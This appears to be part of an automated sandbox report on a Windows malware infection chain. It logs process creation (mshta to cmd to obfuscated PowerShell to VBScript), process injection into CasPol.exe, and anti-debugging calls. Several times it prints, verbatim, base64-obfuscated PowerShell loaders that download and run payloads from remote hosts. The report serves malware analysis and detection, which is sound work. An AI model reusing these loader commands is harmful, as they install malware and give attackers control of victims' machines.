                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00442554 mov eax, dword ptr fs:[00000030h]12_2_00442554
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044E92E GetProcessHeap,12_2_0044E92E
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00434168
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043A65D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00433B44
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433CD7 SetUnhandledExceptionFilter,12_2_00433CD7

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: Yara matchFile source: amsi32_8184.amsi.csv, type: OTHER
                          Source: Yara matchFile source: amsi32_8184.amsi.csv, type: OTHER
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8184, type: MEMORYSTR
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: D6F008Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe12_2_00410F36
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418754 mouse_event,12_2_00418754
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eykjjr5p\eykjjr5p.cmdline"Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB0F9.tmp" "c:\Users\user\AppData\Local\Temp\eykjjr5p\CSC29E03D134814371801318532EC93FB.TMP"Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeingJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jdrjrjzkicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrklxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfckrfrklosxrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvsbg1ptiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwmjqz0z0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbqwcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagbfd1whlfsfusdwludcagicagicagicagicagicagicagicagicagicagicagicbbynqssw50uhryicagicagicagicagicagicagicagicagicagicagicagihbuqncpoycgicagicagicagicagicagicagicagicagicagicagicaglu5hbwugicagicagicagicagicagicagicagicagicagicagicaginvvuyigicagicagicagicagicagicagicagicagicagicagicaglu5btwvtuefjzsagicagicagicagicagicagicagicagicagicagicagicbjucagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicq0suy2sjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos8xmtgvznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91z29vzc50suyilcikru5wokfquerbvefcznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91lnziuyismcwwkttzdefyvc1zbgvfccgzkttpbnzvs0utzxhwckvtu2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxgzyzwvzaxplzhjlc3nmb3juyxr1cmfsymvhdxr5aw50aglzy2fzzwzvcnlvds52ylmi'+[char]34+'))')))"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jdrjrjzkicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrklxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfckrfrklosxrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvsbg1ptiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwmjqz0z0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbqwcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagbfd1whlfsfusdwludcagicagicagicagicagicagicagicagicagicagicagicbbynqssw50uhryicagicagicagicagicagicagicagicagicagicagicagihbuqncpoycgicagicagicagicagicagicagicagicagicagicagicaglu5hbwugicagicagicagicagicagicagicagicagicagicagicaginvvuyigicagicagicagicagicagicagicagicagicagicagicaglu5btwvtuefjzsagicagicagicagicagicagicagicagicagicagicagicbjucagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicq0suy2sjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos8xmtgvznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91z29vzc50suyilcikru5wokfquerbvefcznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91lnziuyismcwwkttzdefyvc1zbgvfccgzkttpbnzvs0utzxhwckvtu2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxgzyzwvzaxplzhjlc3nmb3juyxr1cmfsymvhdxr5aw50aglzy2fzzwzvcnlvds52ylmi'+[char]34+'))')))"
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $comicsverse = 'jghlbgljb3byb3rlawqgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhp2ywk4nnvol2ltywdll3vwbg9hzc92mtcznda1mdk5ms91bnhhb29pewt4zm13oxbhbjr6ms5qcgcgjzskbwv0yxboexrlid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddsky2hvdwwgpsakbwv0yxboexrllkrvd25sb2fkrgf0ysgkagvsawnvchjvdgvpzck7jhbvb2tvbya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrjag91bck7jhjhbmdpbmvzcya9icc8pejbu0u2nf9tvefsvd4+jzskegfudghhbgluzsa9icc8pejbu0u2nf9ftkq+pic7jfbpemfycm8gpsakcg9va29vlkluzgv4t2yojhjhbmdpbmvzcyk7jghhbmdlcia9icrwb29rb28usw5kzxhpzigkegfudghhbgluzsk7jfbpemfycm8glwdlidaglwfuzcakagfuz2vyic1ndcakugl6yxjybzskugl6yxjybyarpsakcmfuz2luzxnzlkxlbmd0adskc3ludgf4aw4gpsakagfuz2vyic0gjfbpemfycm87jgluc2fsdmvhymxlid0gjhbvb2tvby5tdwjzdhjpbmcojfbpemfycm8sicrzew50yxhpbik7jhvuy2x1dhrlcia9ic1qb2luicgkaw5zywx2zwfibguuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojgluc2fsdmvhymxllkxlbmd0acldoyrjyxrhc3ryb3bozsa9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojhvuy2x1dhrlcik7jg5lcghyb2kgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrjyxrhc3ryb3bozsk7jgnvbnzlcmjzid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgnvbnzlcmjzlkludm9rzsgkbnvsbcwgqcgnmc9mv3pwcs9yl2vllmv0c2fwly86c3b0dggnlcanjghhc3nszwqnlcanjghhc3nszwqnlcanjghhc3nszwqnlcanq2fzug9sjywgjyroyxnzbgvkjywgjyroyxnzbgvkjywnjghhc3nszwqnlcckagfzc2xlzccsjyroyxnzbgvkjywnjghhc3nszwqnlcckagfzc2xlzccsjzenlcckagfzc2xlzccsjycpkts=';$eyeing = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($comicsverse));invoke-expression $eyeing
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jdrjrjzkicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrklxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfckrfrklosxrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvsbg1ptiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwmjqz0z0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbqwcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagbfd1whlfsfusdwludcagicagicagicagicagicagicagicagicagicagicagicbbynqssw50uhryicagicagicagicagicagicagicagicagicagicagicagihbuqncpoycgicagicagicagicagicagicagicagicagicagicagicaglu5hbwugicagicagicagicagicagicagicagicagicagicagicaginvvuyigicagicagicagicagicagicagicagicagicagicagicaglu5btwvtuefjzsagicagicagicagicagicagicagicagicagicagicagicbjucagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicq0suy2sjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos8xmtgvznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91z29vzc50suyilcikru5wokfquerbvefcznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91lnziuyismcwwkttzdefyvc1zbgvfccgzkttpbnzvs0utzxhwckvtu2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxgzyzwvzaxplzhjlc3nmb3juyxr1cmfsymvhdxr5aw50aglzy2fzzwzvcnlvds52ylmi'+[char]34+'))')))"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jdrjrjzkicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrklxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfckrfrklosxrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvsbg1ptiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwmjqz0z0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbqwcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagbfd1whlfsfusdwludcagicagicagicagicagicagicagicagicagicagicagicbbynqssw50uhryicagicagicagicagicagicagicagicagicagicagicagihbuqncpoycgicagicagicagicagicagicagicagicagicagicagicaglu5hbwugicagicagicagicagicagicagicagicagicagicagicaginvvuyigicagicagicagicagicagicagicagicagicagicagicaglu5btwvtuefjzsagicagicagicagicagicagicagicagicagicagicagicbjucagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicq0suy2sjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos8xmtgvznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91z29vzc50suyilcikru5wokfquerbvefcznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91lnziuyismcwwkttzdefyvc1zbgvfccgzkttpbnzvs0utzxhwckvtu2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxgzyzwvzaxplzhjlc3nmb3juyxr1cmfsymvhdxr5aw50aglzy2fzzwzvcnlvds52ylmi'+[char]34+'))')))"Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $comicsverse = 'jghlbgljb3byb3rlawqgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhp2ywk4nnvol2ltywdll3vwbg9hzc92mtcznda1mdk5ms91bnhhb29pewt4zm13oxbhbjr6ms5qcgcgjzskbwv0yxboexrlid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddsky2hvdwwgpsakbwv0yxboexrllkrvd25sb2fkrgf0ysgkagvsawnvchjvdgvpzck7jhbvb2tvbya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrjag91bck7jhjhbmdpbmvzcya9icc8pejbu0u2nf9tvefsvd4+jzskegfudghhbgluzsa9icc8pejbu0u2nf9ftkq+pic7jfbpemfycm8gpsakcg9va29vlkluzgv4t2yojhjhbmdpbmvzcyk7jghhbmdlcia9icrwb29rb28usw5kzxhpzigkegfudghhbgluzsk7jfbpemfycm8glwdlidaglwfuzcakagfuz2vyic1ndcakugl6yxjybzskugl6yxjybyarpsakcmfuz2luzxnzlkxlbmd0adskc3ludgf4aw4gpsakagfuz2vyic0gjfbpemfycm87jgluc2fsdmvhymxlid0gjhbvb2tvby5tdwjzdhjpbmcojfbpemfycm8sicrzew50yxhpbik7jhvuy2x1dhrlcia9ic1qb2luicgkaw5zywx2zwfibguuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojgluc2fsdmvhymxllkxlbmd0acldoyrjyxrhc3ryb3bozsa9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojhvuy2x1dhrlcik7jg5lcghyb2kgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrjyxrhc3ryb3bozsk7jgnvbnzlcmjzid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgnvbnzlcmjzlkludm9rzsgkbnvsbcwgqcgnmc9mv3pwcs9yl2vllmv0c2fwly86c3b0dggnlcanjghhc3nszwqnlcanjghhc3nszwqnlcanjghhc3nszwqnlcanq2fzug9sjywgjyroyxnzbgvkjywgjyroyxnzbgvkjywnjghhc3nszwqnlcckagfzc2xlzccsjyroyxnzbgvkjywnjghhc3nszwqnlcckagfzc2xlzccsjzenlcckagfzc2xlzccsjycpkts=';$eyeing = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($comicsverse));invoke-expression $eyeingJump to behavior
                          Source: CasPol.exe, 0000000C.00000002.3841776803.0000000001028000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                          Source: CasPol.exe, 0000000C.00000002.3841776803.0000000001028000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerD
                          Source: CasPol.exe, 0000000C.00000002.3841776803.0000000001028000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager/
                          Source: CasPol.exe, 0000000C.00000002.3841776803.0000000001028000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager6
                          Source: CasPol.exe, 0000000C.00000002.3841776803.0000000001028000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerRL\
